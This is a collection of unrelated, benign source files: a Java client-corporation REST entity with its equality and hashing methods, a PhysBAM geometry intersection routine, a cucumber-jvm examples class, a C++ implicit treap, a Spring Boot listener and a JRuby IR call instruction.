this.customObject27s = customObject27s;
}
@JsonProperty("customObject28s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance28> getCustomObject28s() {
return customObject28s;
}
@JsonProperty("customObject28s")
public void setCustomObject28s(OneToMany<ClientCorporationCustomObjectInstance28> customObject28s) {
this.customObject28s = customObject28s;
}
@JsonProperty("customObject29s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance29> getCustomObject29s() {
return customObject29s;
}
@JsonProperty("customObject29s")
public void setCustomObject29s(OneToMany<ClientCorporationCustomObjectInstance29> customObject29s) {
this.customObject29s = customObject29s;
}
// Fixed: the getter's JSON property name was misspelled "customObject230s",
// which made Jackson expose this association under the wrong name (the setter
// and field both use "customObject30s"). Getter and setter must agree.
@JsonProperty("customObject30s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance30> getCustomObject30s() {
    return customObject30s;
}
@JsonProperty("customObject30s")
public void setCustomObject30s(OneToMany<ClientCorporationCustomObjectInstance30> customObject30s) {
this.customObject30s = customObject30s;
}
@JsonProperty("customObject31s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance31> getCustomObject31s() {
return customObject31s;
}
@JsonProperty("customObject31s")
public void setCustomObject31s(OneToMany<ClientCorporationCustomObjectInstance31> customObject31s) {
this.customObject31s = customObject31s;
}
@JsonProperty("customObject32s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance32> getCustomObject32s() {
return customObject32s;
}
@JsonProperty("customObject32s")
public void setCustomObject32s(OneToMany<ClientCorporationCustomObjectInstance32> customObject32s) {
this.customObject32s = customObject32s;
}
@JsonProperty("customObject33s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance33> getCustomObject33s() {
return customObject33s;
}
@JsonProperty("customObject33s")
public void setCustomObject33s(OneToMany<ClientCorporationCustomObjectInstance33> customObject33s) {
this.customObject33s = customObject33s;
}
@JsonProperty("customObject34s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance34> getCustomObject34s() {
return customObject34s;
}
@JsonProperty("customObject34s")
public void setCustomObject34s(OneToMany<ClientCorporationCustomObjectInstance34> customObject34s) {
this.customObject34s = customObject34s;
}
@JsonProperty("customObject35s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance35> getCustomObject35s() {
return customObject35s;
}
@JsonProperty("customObject35s")
public void setCustomObject35s(OneToMany<ClientCorporationCustomObjectInstance35> customObject35s) {
this.customObject35s = customObject35s;
}
/**
 * Field-by-field equality over every REST-exposed property of this entity.
 * Previously stopped at customObject20s; now also covers certifications and
 * customObject21s-customObject35s so equals stays consistent with the
 * accessors declared on this class (and with hashCode).
 */
@Override
public boolean equals(Object o) {
    if (this == o) return true;
    if (o == null || getClass() != o.getClass()) return false;
    if (!super.equals(o)) return false;
    ClientCorporation that = (ClientCorporation) o;
    if (id != null ? !id.equals(that.id) : that.id != null) return false;
    if (address != null ? !address.equals(that.address) : that.address != null) return false;
    if (annualRevenue != null ? !annualRevenue.equals(that.annualRevenue) : that.annualRevenue != null)
        return false;
    if (billingAddress != null ? !billingAddress.equals(that.billingAddress) : that.billingAddress != null)
        return false;
    if (billingContact != null ? !billingContact.equals(that.billingContact) : that.billingContact != null)
        return false;
    if (billingFrequency != null ? !billingFrequency.equals(that.billingFrequency) : that.billingFrequency != null)
        return false;
    if (billingPhone != null ? !billingPhone.equals(that.billingPhone) : that.billingPhone != null) return false;
    if (branch != null ? !branch.equals(that.branch) : that.branch != null) return false;
    if (businessSectorList != null ? !businessSectorList.equals(that.businessSectorList) : that.businessSectorList != null)
        return false;
    if (childClientCorporations != null ? !childClientCorporations.equals(that.childClientCorporations) : that.childClientCorporations != null)
        return false;
    if (clientContacts != null ? !clientContacts.equals(that.clientContacts) : that.clientContacts != null)
        return false;
    if (companyDescription != null ? !companyDescription.equals(that.companyDescription) : that.companyDescription != null)
        return false;
    if (companyURL != null ? !companyURL.equals(that.companyURL) : that.companyURL != null) return false;
    if (competitors != null ? !competitors.equals(that.competitors) : that.competitors != null) return false;
    if (culture != null ? !culture.equals(that.culture) : that.culture != null) return false;
    if (dateAdded != null ? !dateAdded.equals(that.dateAdded) : that.dateAdded != null) return false;
    if (dateFounded != null ? !dateFounded.equals(that.dateFounded) : that.dateFounded != null) return false;
    if (dateLastModified != null ? !dateLastModified.equals(that.dateLastModified) : that.dateLastModified != null)
        return false;
    if (department != null ? !department.equals(that.department) : that.department != null) return false;
    if (externalID != null ? !externalID.equals(that.externalID) : that.externalID != null) return false;
    if (fax != null ? !fax.equals(that.fax) : that.fax != null) return false;
    if (feeArrangement != null ? !feeArrangement.equals(that.feeArrangement) : that.feeArrangement != null)
        return false;
    if (funding != null ? !funding.equals(that.funding) : that.funding != null) return false;
    if (industryList != null ? !industryList.equals(that.industryList) : that.industryList != null) return false;
    if (invoiceFormat != null ? !invoiceFormat.equals(that.invoiceFormat) : that.invoiceFormat != null)
        return false;
    if (leads != null ? !leads.equals(that.leads) : that.leads != null) return false;
    if (linkedinProfileName != null ? !linkedinProfileName.equals(that.linkedinProfileName) : that.linkedinProfileName != null)
        return false;
    if (name != null ? !name.equals(that.name) : that.name != null) return false;
    if (notes != null ? !notes.equals(that.notes) : that.notes != null) return false;
    if (numEmployees != null ? !numEmployees.equals(that.numEmployees) : that.numEmployees != null) return false;
    if (numOffices != null ? !numOffices.equals(that.numOffices) : that.numOffices != null) return false;
    if (ownership != null ? !ownership.equals(that.ownership) : that.ownership != null) return false;
    if (owners != null ? !owners.equals(that.owners) : that.owners != null) return false;
    if (parentClientCorporation != null ? !parentClientCorporation.equals(that.parentClientCorporation) : that.parentClientCorporation != null)
        return false;
    if (phone != null ? !phone.equals(that.phone) : that.phone != null) return false;
    if (revenue != null ? !revenue.equals(that.revenue) : that.revenue != null) return false;
    if (status != null ? !status.equals(that.status) : that.status != null) return false;
    if (taxRate != null ? !taxRate.equals(that.taxRate) : that.taxRate != null) return false;
    if (tickerSymbol != null ? !tickerSymbol.equals(that.tickerSymbol) : that.tickerSymbol != null) return false;
    if (trackTitle != null ? !trackTitle.equals(that.trackTitle) : that.trackTitle != null) return false;
    if (workWeekStart != null ? !workWeekStart.equals(that.workWeekStart) : that.workWeekStart != null)
        return false;
    if (requirements != null ? !requirements.equals(that.requirements) : that.requirements != null)
        return false;
    if (certificationGroups != null ? !certificationGroups.equals(that.certificationGroups) : that.certificationGroups != null)
        return false;
    // Previously missing: certifications and customObject21s-35s were ignored,
    // so two corporations differing only in those fields compared equal.
    if (certifications != null ? !certifications.equals(that.certifications) : that.certifications != null)
        return false;
    if (customObject1s != null ? !customObject1s.equals(that.customObject1s) : that.customObject1s != null)
        return false;
    if (customObject2s != null ? !customObject2s.equals(that.customObject2s) : that.customObject2s != null)
        return false;
    if (customObject3s != null ? !customObject3s.equals(that.customObject3s) : that.customObject3s != null)
        return false;
    if (customObject4s != null ? !customObject4s.equals(that.customObject4s) : that.customObject4s != null)
        return false;
    if (customObject5s != null ? !customObject5s.equals(that.customObject5s) : that.customObject5s != null)
        return false;
    if (customObject6s != null ? !customObject6s.equals(that.customObject6s) : that.customObject6s != null)
        return false;
    if (customObject7s != null ? !customObject7s.equals(that.customObject7s) : that.customObject7s != null)
        return false;
    if (customObject8s != null ? !customObject8s.equals(that.customObject8s) : that.customObject8s != null)
        return false;
    if (customObject9s != null ? !customObject9s.equals(that.customObject9s) : that.customObject9s != null)
        return false;
    if (customObject10s != null ? !customObject10s.equals(that.customObject10s) : that.customObject10s != null)
        return false;
    if (customObject11s != null ? !customObject11s.equals(that.customObject11s) : that.customObject11s != null)
        return false;
    if (customObject12s != null ? !customObject12s.equals(that.customObject12s) : that.customObject12s != null)
        return false;
    if (customObject13s != null ? !customObject13s.equals(that.customObject13s) : that.customObject13s != null)
        return false;
    if (customObject14s != null ? !customObject14s.equals(that.customObject14s) : that.customObject14s != null)
        return false;
    if (customObject15s != null ? !customObject15s.equals(that.customObject15s) : that.customObject15s != null)
        return false;
    if (customObject16s != null ? !customObject16s.equals(that.customObject16s) : that.customObject16s != null)
        return false;
    if (customObject17s != null ? !customObject17s.equals(that.customObject17s) : that.customObject17s != null)
        return false;
    if (customObject18s != null ? !customObject18s.equals(that.customObject18s) : that.customObject18s != null)
        return false;
    if (customObject19s != null ? !customObject19s.equals(that.customObject19s) : that.customObject19s != null)
        return false;
    if (customObject20s != null ? !customObject20s.equals(that.customObject20s) : that.customObject20s != null)
        return false;
    if (customObject21s != null ? !customObject21s.equals(that.customObject21s) : that.customObject21s != null)
        return false;
    if (customObject22s != null ? !customObject22s.equals(that.customObject22s) : that.customObject22s != null)
        return false;
    if (customObject23s != null ? !customObject23s.equals(that.customObject23s) : that.customObject23s != null)
        return false;
    if (customObject24s != null ? !customObject24s.equals(that.customObject24s) : that.customObject24s != null)
        return false;
    if (customObject25s != null ? !customObject25s.equals(that.customObject25s) : that.customObject25s != null)
        return false;
    if (customObject26s != null ? !customObject26s.equals(that.customObject26s) : that.customObject26s != null)
        return false;
    if (customObject27s != null ? !customObject27s.equals(that.customObject27s) : that.customObject27s != null)
        return false;
    if (customObject28s != null ? !customObject28s.equals(that.customObject28s) : that.customObject28s != null)
        return false;
    if (customObject29s != null ? !customObject29s.equals(that.customObject29s) : that.customObject29s != null)
        return false;
    if (customObject30s != null ? !customObject30s.equals(that.customObject30s) : that.customObject30s != null)
        return false;
    if (customObject31s != null ? !customObject31s.equals(that.customObject31s) : that.customObject31s != null)
        return false;
    if (customObject32s != null ? !customObject32s.equals(that.customObject32s) : that.customObject32s != null)
        return false;
    if (customObject33s != null ? !customObject33s.equals(that.customObject33s) : that.customObject33s != null)
        return false;
    if (customObject34s != null ? !customObject34s.equals(that.customObject34s) : that.customObject34s != null)
        return false;
    return customObject35s != null ? customObject35s.equals(that.customObject35s) : that.customObject35s == null;
}
/**
 * Hash over the same field set as {@link #equals(Object)}. Previously stopped
 * at customObject20s; now also folds in certifications and
 * customObject21s-customObject35s so the equals/hashCode contract holds for
 * objects differing only in those fields.
 */
@Override
public int hashCode() {
    int result = super.hashCode();
    result = 31 * result + (id != null ? id.hashCode() : 0);
    result = 31 * result + (address != null ? address.hashCode() : 0);
    result = 31 * result + (annualRevenue != null ? annualRevenue.hashCode() : 0);
    result = 31 * result + (billingAddress != null ? billingAddress.hashCode() : 0);
    result = 31 * result + (billingContact != null ? billingContact.hashCode() : 0);
    result = 31 * result + (billingFrequency != null ? billingFrequency.hashCode() : 0);
    result = 31 * result + (billingPhone != null ? billingPhone.hashCode() : 0);
    result = 31 * result + (branch != null ? branch.hashCode() : 0);
    result = 31 * result + (businessSectorList != null ? businessSectorList.hashCode() : 0);
    result = 31 * result + (childClientCorporations != null ? childClientCorporations.hashCode() : 0);
    result = 31 * result + (clientContacts != null ? clientContacts.hashCode() : 0);
    result = 31 * result + (companyDescription != null ? companyDescription.hashCode() : 0);
    result = 31 * result + (companyURL != null ? companyURL.hashCode() : 0);
    result = 31 * result + (competitors != null ? competitors.hashCode() : 0);
    result = 31 * result + (culture != null ? culture.hashCode() : 0);
    result = 31 * result + (dateAdded != null ? dateAdded.hashCode() : 0);
    result = 31 * result + (dateFounded != null ? dateFounded.hashCode() : 0);
    result = 31 * result + (dateLastModified != null ? dateLastModified.hashCode() : 0);
    result = 31 * result + (department != null ? department.hashCode() : 0);
    result = 31 * result + (externalID != null ? externalID.hashCode() : 0);
    result = 31 * result + (fax != null ? fax.hashCode() : 0);
    result = 31 * result + (feeArrangement != null ? feeArrangement.hashCode() : 0);
    result = 31 * result + (funding != null ? funding.hashCode() : 0);
    result = 31 * result + (industryList != null ? industryList.hashCode() : 0);
    result = 31 * result + (invoiceFormat != null ? invoiceFormat.hashCode() : 0);
    result = 31 * result + (leads != null ? leads.hashCode() : 0);
    result = 31 * result + (linkedinProfileName != null ? linkedinProfileName.hashCode() : 0);
    result = 31 * result + (name != null ? name.hashCode() : 0);
    result = 31 * result + (notes != null ? notes.hashCode() : 0);
    result = 31 * result + (numEmployees != null ? numEmployees.hashCode() : 0);
    result = 31 * result + (numOffices != null ? numOffices.hashCode() : 0);
    result = 31 * result + (ownership != null ? ownership.hashCode() : 0);
    result = 31 * result + (owners != null ? owners.hashCode() : 0);
    result = 31 * result + (parentClientCorporation != null ? parentClientCorporation.hashCode() : 0);
    result = 31 * result + (phone != null ? phone.hashCode() : 0);
    result = 31 * result + (revenue != null ? revenue.hashCode() : 0);
    result = 31 * result + (status != null ? status.hashCode() : 0);
    result = 31 * result + (taxRate != null ? taxRate.hashCode() : 0);
    result = 31 * result + (tickerSymbol != null ? tickerSymbol.hashCode() : 0);
    result = 31 * result + (trackTitle != null ? trackTitle.hashCode() : 0);
    result = 31 * result + (workWeekStart != null ? workWeekStart.hashCode() : 0);
    result = 31 * result + (requirements != null ? requirements.hashCode() : 0);
    result = 31 * result + (certificationGroups != null ? certificationGroups.hashCode() : 0);
    result = 31 * result + (certifications != null ? certifications.hashCode() : 0);
    result = 31 * result + (customObject1s != null ? customObject1s.hashCode() : 0);
    result = 31 * result + (customObject2s != null ? customObject2s.hashCode() : 0);
    result = 31 * result + (customObject3s != null ? customObject3s.hashCode() : 0);
    result = 31 * result + (customObject4s != null ? customObject4s.hashCode() : 0);
    result = 31 * result + (customObject5s != null ? customObject5s.hashCode() : 0);
    result = 31 * result + (customObject6s != null ? customObject6s.hashCode() : 0);
    result = 31 * result + (customObject7s != null ? customObject7s.hashCode() : 0);
    result = 31 * result + (customObject8s != null ? customObject8s.hashCode() : 0);
    result = 31 * result + (customObject9s != null ? customObject9s.hashCode() : 0);
    result = 31 * result + (customObject10s != null ? customObject10s.hashCode() : 0);
    result = 31 * result + (customObject11s != null ? customObject11s.hashCode() : 0);
    result = 31 * result + (customObject12s != null ? customObject12s.hashCode() : 0);
    result = 31 * result + (customObject13s != null ? customObject13s.hashCode() : 0);
    result = 31 * result + (customObject14s != null ? customObject14s.hashCode() : 0);
    result = 31 * result + (customObject15s != null ? customObject15s.hashCode() : 0);
    result = 31 * result + (customObject16s != null ? customObject16s.hashCode() : 0);
    result = 31 * result + (customObject17s != null ? customObject17s.hashCode() : 0);
    result = 31 * result + (customObject18s != null ? customObject18s.hashCode() : 0);
    result = 31 * result + (customObject19s != null ? customObject19s.hashCode() : 0);
    result = 31 * result + (customObject20s != null ? customObject20s.hashCode() : 0);
    result = 31 * result + (customObject21s != null ? customObject21s.hashCode() : 0);
    result = 31 * result + (customObject22s != null ? customObject22s.hashCode() : 0);
    result = 31 * result + (customObject23s != null ? customObject23s.hashCode() : 0);
    result = 31 * result + (customObject24s != null ? customObject24s.hashCode() : 0);
    result = 31 * result + (customObject25s != null ? customObject25s.hashCode() : 0);
    result = 31 * result + (customObject26s != null ? customObject26s.hashCode() : 0);
    result = 31 * result + (customObject27s != null ? customObject27s.hashCode() : 0);
    result = 31 * result + (customObject28s != null ? customObject28s.hashCode() : 0);
    result = 31 * result + (customObject29s != null ? customObject29s.hashCode() : 0);
    result = 31 * result + (customObject30s != null ? customObject30s.hashCode() : 0);
    result = 31 * result + (customObject31s != null ? customObject31s.hashCode() : 0);
    result = 31 * result + (customObject32s != null ? customObject32s.hashCode() : 0);
    result = 31 * result + (customObject33s != null ? customObject33s.hashCode() : 0);
    result = 31 * result + (customObject34s != null ? customObject34s.hashCode() : 0);
    result = 31 * result + (customObject35s != null ? customObject35s.hashCode() : 0);
    return result;
}
/**
 * Debug representation listing every REST-exposed field. Previously stopped
 * at customObject20s; now also includes certifications and
 * customObject21s-customObject35s, matching the accessors on this class.
 */
@Override
public String toString() {
    final StringBuilder sb = new StringBuilder("ClientCorporation{");
    sb.append("id=").append(id);
    sb.append(", address=").append(address);
    sb.append(", annualRevenue=").append(annualRevenue);
    sb.append(", billingAddress=").append(billingAddress);
    sb.append(", billingContact='").append(billingContact).append('\'');
    sb.append(", billingFrequency='").append(billingFrequency).append('\'');
    sb.append(", billingPhone='").append(billingPhone).append('\'');
    sb.append(", branch=").append(branch);
    sb.append(", businessSectorList='").append(businessSectorList).append('\'');
    sb.append(", childClientCorporations=").append(childClientCorporations);
    sb.append(", clientContacts=").append(clientContacts);
    sb.append(", companyDescription='").append(companyDescription).append('\'');
    sb.append(", companyURL='").append(companyURL).append('\'');
    sb.append(", competitors='").append(competitors).append('\'');
    sb.append(", culture='").append(culture).append('\'');
    sb.append(", dateAdded=").append(dateAdded);
    sb.append(", dateFounded=").append(dateFounded);
    sb.append(", dateLastModified=").append(dateLastModified);
    sb.append(", department=").append(department);
    sb.append(", externalID='").append(externalID).append('\'');
    sb.append(", fax='").append(fax).append('\'');
    sb.append(", feeArrangement=").append(feeArrangement);
    sb.append(", funding='").append(funding).append('\'');
    sb.append(", industryList='").append(industryList).append('\'');
    sb.append(", invoiceFormat='").append(invoiceFormat).append('\'');
    sb.append(", leads=").append(leads);
    sb.append(", linkedinProfileName='").append(linkedinProfileName).append('\'');
    sb.append(", name='").append(name).append('\'');
    sb.append(", notes='").append(notes).append('\'');
    sb.append(", numEmployees=").append(numEmployees);
    sb.append(", numOffices=").append(numOffices);
    sb.append(", ownership='").append(ownership).append('\'');
    sb.append(", owners=").append(owners);
    sb.append(", parentClientCorporation=").append(parentClientCorporation);
    sb.append(", phone='").append(phone).append('\'');
    sb.append(", revenue='").append(revenue).append('\'');
    sb.append(", status='").append(status).append('\'');
    sb.append(", taxRate=").append(taxRate);
    sb.append(", tickerSymbol='").append(tickerSymbol).append('\'');
    sb.append(", trackTitle='").append(trackTitle).append('\'');
    sb.append(", workWeekStart=").append(workWeekStart);
    sb.append(", requirements=").append(requirements);
    sb.append(", certificationGroups=").append(certificationGroups);
    sb.append(", certifications=").append(certifications);
    sb.append(", customObject1s=").append(customObject1s);
    sb.append(", customObject2s=").append(customObject2s);
    sb.append(", customObject3s=").append(customObject3s);
    sb.append(", customObject4s=").append(customObject4s);
    sb.append(", customObject5s=").append(customObject5s);
    sb.append(", customObject6s=").append(customObject6s);
    sb.append(", customObject7s=").append(customObject7s);
    sb.append(", customObject8s=").append(customObject8s);
    sb.append(", customObject9s=").append(customObject9s);
    sb.append(", customObject10s=").append(customObject10s);
    sb.append(", customObject11s=").append(customObject11s);
    sb.append(", customObject12s=").append(customObject12s);
    sb.append(", customObject13s=").append(customObject13s);
    sb.append(", customObject14s=").append(customObject14s);
    sb.append(", customObject15s=").append(customObject15s);
    sb.append(", customObject16s=").append(customObject16s);
    sb.append(", customObject17s=").append(customObject17s);
    sb.append(", customObject18s=").append(customObject18s);
    sb.append(", customObject19s=").append(customObject19s);
    sb.append(", customObject20s=").append(customObject20s);
    sb.append(", customObject21s=").append(customObject21s);
    sb.append(", customObject22s=").append(customObject22s);
    sb.append(", customObject23s=").append(customObject23s);
    sb.append(", customObject24s=").append(customObject24s);
    sb.append(", customObject25s=").append(customObject25s);
    sb.append(", customObject26s=").append(customObject26s);
    sb.append(", customObject27s=").append(customObject27s);
    sb.append(", customObject28s=").append(customObject28s);
    sb.append(", customObject29s=").append(customObject29s);
    sb.append(", customObject30s=").append(customObject30s);
    sb.append(", customObject31s=").append(customObject31s);
    sb.append(", customObject32s=").append(customObject32s);
    sb.append(", customObject33s=").append(customObject33s);
    sb.append(", customObject34s=").append(customObject34s);
    sb.append(", customObject35s=").append(customObject35s);
    sb.append('}');
    return sb.toString();
}
/**
 * Builds a minimal ClientCorporation populated with only the fields
 * required for a successful insert (used as a test/seed fixture).
 *
 * @return a new ClientCorporation ready to be persisted
 */
public ClientCorporation instantiateForInsert() {
    ClientCorporation entity = new ClientCorporation();
    entity.setAddress(new Address().instantiateForInsert());
    // BigDecimal.valueOf is preferred over the double constructor, which can
    // capture binary-fraction artifacts (e.g. new BigDecimal(0.1)). The
    // original doubles (10000.00, 100.00) are whole numbers, so valueOf(long)
    // produces an identical value and scale.
    entity.setAnnualRevenue(BigDecimal.valueOf(10000));
    entity.setFeeArrangement(BigDecimal.valueOf(100));
    entity.setName("<NAME>");
    entity.setNumEmployees(500);
    entity.setNumOffices(1);
    entity.setStatus("Active");
    return entity;
}
}
|
//#####################################################################
// Copyright 2009, <NAME>.
// This file is part of PhysBAM whose distribution is governed by the license contained in the accompanying file PHYSBAM_COPYRIGHT.txt.
//#####################################################################
// Namespace INTERSECTION
//#####################################################################
#include <PhysBAM_Tools/Math_Tools/RANGE.h>
#include <PhysBAM_Geometry/Basic_Geometry/POINT_SIMPLEX_1D.h>
#include <PhysBAM_Geometry/Basic_Geometry_Intersections/BOX_POINT_SIMPLEX_1D_INTERSECTION.h>
namespace PhysBAM{
namespace INTERSECTION{
//#####################################################################
// Function Intersects
//#####################################################################
template<class T> bool Intersects(const RANGE<VECTOR<T,1> >& box,const POINT_SIMPLEX_1D<T>& point,const T thickness_over_two)
{
    // A 1-D point simplex intersects the box iff its point is not strictly
    // outside the box thickened by thickness_over_two.
    const bool point_outside=box.Outside(point.x1,thickness_over_two);
    return !point_outside;
}
//#####################################################################
// Function Halfspace_Intersection_Size
//#####################################################################
template<class T> T Halfspace_Intersection_Size(const RANGE<VECTOR<T,1> >& box,const POINT_SIMPLEX_1D<T>& halfspace,VECTOR<T,1>* centroid)
{
    // Intentionally unimplemented for 1-D point simplices: any call aborts via
    // the PHYSBAM_NOT_IMPLEMENTED macro. Declared only so explicit template
    // instantiations below link.
    PHYSBAM_NOT_IMPLEMENTED();
}
//#####################################################################
template bool Intersects(const RANGE<VECTOR<float,1> >&,const POINT_SIMPLEX_1D<float>&,const float);
template float Halfspace_Intersection_Size(const RANGE<VECTOR<float,1> >&,const POINT_SIMPLEX_1D<float>&,VECTOR<float,1>*);
#ifndef COMPILE_WITHOUT_DOUBLE_SUPPORT
template bool Intersects(const RANGE<VECTOR<double,1> >&,const POINT_SIMPLEX_1D<double>&,const double);
template double Halfspace_Intersection_Size(const RANGE<VECTOR<double,1> >&,const POINT_SIMPLEX_1D<double>&,VECTOR<double,1>*);
#endif
};
};
|
<reponame>fabien7474/cucumber-jvm
package cucumber.runtime.model;
import gherkin.formatter.Formatter;
import gherkin.formatter.model.Examples;
import gherkin.formatter.model.ExamplesTableRow;
import gherkin.formatter.model.Tag;
import java.util.ArrayList;
import java.util.HashSet;
import java.util.List;
import java.util.Set;
public class CucumberExamples {
    private final CucumberScenarioOutline cucumberScenarioOutline;
    private final Examples examples;

    public CucumberExamples(CucumberScenarioOutline cucumberScenarioOutline, Examples examples) {
        this.cucumberScenarioOutline = cucumberScenarioOutline;
        this.examples = examples;
    }

    /**
     * Expands this examples table into one concrete scenario per data row.
     * The first row is the header row; every subsequent row produces a scenario.
     */
    public List<CucumberScenario> createExampleScenarios() {
        List<ExamplesTableRow> rows = examples.getRows();
        ExamplesTableRow headerRow = rows.get(0);
        List<Tag> allTags = new ArrayList<Tag>(tagsAndInheritedTags());
        List<CucumberScenario> scenarios = new ArrayList<CucumberScenario>();
        for (int row = 1; row < rows.size(); row++) {
            scenarios.add(cucumberScenarioOutline.createExampleScenario(headerRow, rows.get(row), allTags, examples.getDescription()));
        }
        return scenarios;
    }

    // Union of the outline's own/inherited tags with the tags on this examples block.
    private Set<Tag> tagsAndInheritedTags() {
        Set<Tag> merged = new HashSet<Tag>();
        merged.addAll(cucumberScenarioOutline.tagsAndInheritedTags());
        merged.addAll(examples.getTags());
        return merged;
    }

    public Examples getExamples() {
        return examples;
    }

    // Replays this examples block through the given gherkin formatter.
    public void format(Formatter formatter) {
        examples.replay(formatter);
    }
}
|
/* The key of each element is the array index of the element.
* Time: O(log N)
* Memory: O(N)
*/
#include <bits/stdc++.h>
using namespace std;
// Implicit treap: a randomized balanced BST keyed by 1-based position,
// supporting O(log N) indexed access, insertion, and deletion.
struct Treap {
    struct Node {
        int val, p, sz;   // value, heap priority, subtree size
        Node *left, *right;
        Node(int val) : val(val), p(randomPriority()), sz(1), left(nullptr), right(nullptr) {}
    };
    // 31 random bits assembled without signed overflow.
    // (The previous rand() * 65536 + rand() overflows int — UB — on platforms
    // where RAND_MAX is 2^31-1, e.g. glibc.)
    static int randomPriority() {
        return ((std::rand() & 0x7FFF) << 16) ^ (std::rand() & 0xFFFF);
    }
    static int getSize(Node *u) {
        return u == nullptr ? 0 : u->sz;
    }
    // Recompute u's subtree size from its children (no-op on nullptr).
    static void update(Node *u) {
        if (u)
            u->sz = 1 + getSize(u->left) + getSize(u->right);
    }
    Node *root;
    Treap() : root(nullptr) {}
    // Join two treaps. Precondition: all positions of u precede all positions of v.
    static Node *join(Node *u, Node *v) {
        if (u == nullptr)
            return v;
        if (v == nullptr)
            return u;
        if (u->p > v->p) {
            u->right = join(u->right, v);
            update(u);
            return u;
        }
        v->left = join(u, v->left);
        update(v);
        return v;
    }
    // Split u into (first k elements, remaining elements).
    static std::pair<Node *, Node *> split(Node *u, int k) {
        if (u == nullptr)
            return std::pair<Node *, Node *>(nullptr, nullptr);
        if (getSize(u->left) + 1 > k) {
            std::pair<Node *, Node *> res = split(u->left, k);
            u->left = res.second;
            res.second = u;
            update(res.first);
            update(res.second);
            return res;
        } else {
            std::pair<Node *, Node *> res = split(u->right, k - getSize(u->left) - 1);
            u->right = res.first;
            res.first = u;
            update(res.first);
            update(res.second);
            return res;
        }
    }
    // Overwrite the value at 1-based position index (no-op if out of range).
    void modify(int index, int val) {
        Node *curr = root;
        while (curr != nullptr) {
            if (getSize(curr->left) + 1 < index)
                index -= getSize(curr->left) + 1, curr = curr->right;
            else if (getSize(curr->left) + 1 > index)
                curr = curr->left;
            else {
                curr->val = val;
                return;
            }
        }
    }
    // Return the value at 1-based position index, or -1 if out of range.
    int get(int index) {
        Node *curr = root;
        while (curr != nullptr) {
            if (getSize(curr->left) + 1 < index)
                index -= getSize(curr->left) + 1, curr = curr->right;
            else if (getSize(curr->left) + 1 > index)
                curr = curr->left;
            else
                return curr->val;
        }
        return -1;
    }
    // Append val after the last element.
    void push_back(int val) {
        root = join(root, new Node(val));
    }
    // Insert val so that exactly `index` existing elements precede it
    // (i.e. the new element lands at 1-based position index + 1).
    void insert(int index, int val) {
        std::pair<Node *, Node *> res = split(root, index);
        root = join(res.first, join(new Node(val), res.second));
    }
    // Remove the element at 1-based position index (no-op if out of range).
    // BUG FIX: the original joined away the *root* of the left split, which is
    // an arbitrary element among positions 1..index — not the index-th one.
    // Splitting a second time at index-1 isolates exactly the target node.
    // The original also leaked the node and dereferenced null on an empty treap.
    void remove(int index) {
        if (index < 1 || index > getSize(root))
            return;
        std::pair<Node *, Node *> withTarget = split(root, index);          // first: positions 1..index
        std::pair<Node *, Node *> target = split(withTarget.first, index - 1); // second: exactly position index
        delete target.second;
        root = join(target.first, withTarget.second);
    }
};
|
package io.leopard.boot;
import org.springframework.boot.context.event.ApplicationEnvironmentPreparedEvent;
import org.springframework.context.ApplicationEvent;
import org.springframework.context.ApplicationListener;
import org.springframework.core.Ordered;
import org.springframework.core.annotation.Order;
@Order(Ordered.LOWEST_PRECEDENCE - 1000) // ensure initialization happens after ConfigFileApplicationListener
public class LeopardApplicationListener implements ApplicationListener<ApplicationEvent> {

    // Base-package list captured from the "app.basePackages" property once the
    // Spring environment has been prepared.
    private static String basePackages;

    @Override
    public void onApplicationEvent(ApplicationEvent event) {
        if (!(event instanceof ApplicationEnvironmentPreparedEvent)) {
            return;
        }
        onApplicationEnvironmentPreparedEvent((ApplicationEnvironmentPreparedEvent) event);
    }

    // Records the configured base packages as soon as the environment is available.
    private void onApplicationEnvironmentPreparedEvent(ApplicationEnvironmentPreparedEvent event) {
        basePackages = event.getEnvironment().getProperty("app.basePackages");
    }

    public static String getBasePackages() {
        return basePackages;
    }
}
|
package org.jruby.ir.instructions;
import org.jruby.ir.IRVisitor;
import org.jruby.ir.Operation;
import org.jruby.ir.instructions.specialized.OneOperandArgNoBlockNoResultCallInstr;
import org.jruby.ir.operands.Operand;
import org.jruby.ir.transformations.inlining.CloneInfo;
import org.jruby.runtime.CallType;
public class NoResultCallInstr extends CallBase {
    // FIXME: Removed results undoes specialized callinstrs. Audit how often and what and make equivalent versions here.

    /**
     * Factory: returns a specialized instruction for the common
     * one-argument / no-block / no-splat case, otherwise a generic
     * no-result call instruction.
     */
    public static NoResultCallInstr create(CallType callType, String name, Operand receiver, Operand[] args, Operand closure) {
        boolean oneSimpleArgNoBlock = closure == null && !containsArgSplat(args) && args.length == 1;
        if (oneSimpleArgNoBlock) {
            return new OneOperandArgNoBlockNoResultCallInstr(callType, name, receiver, args, null);
        }
        return new NoResultCallInstr(Operation.NORESULT_CALL, callType, name, receiver, args, closure);
    }

    public NoResultCallInstr(Operation op, CallType callType, String name, Operand receiver, Operand[] args, Operand closure) {
        super(op, callType, name, receiver, args, closure);
    }

    @Override
    public Instr clone(CloneInfo ii) {
        Operand clonedReceiver = getReceiver().cloneForInlining(ii);
        Operand clonedClosure = getClosureArg() == null ? null : getClosureArg().cloneForInlining(ii);
        return new NoResultCallInstr(getOperation(), getCallType(), getName(), clonedReceiver, cloneCallArgs(ii), clonedClosure);
    }

    @Override
    public void visit(IRVisitor visitor) {
        visitor.NoResultCallInstr(this);
    }
}
|
Subsets and Splits
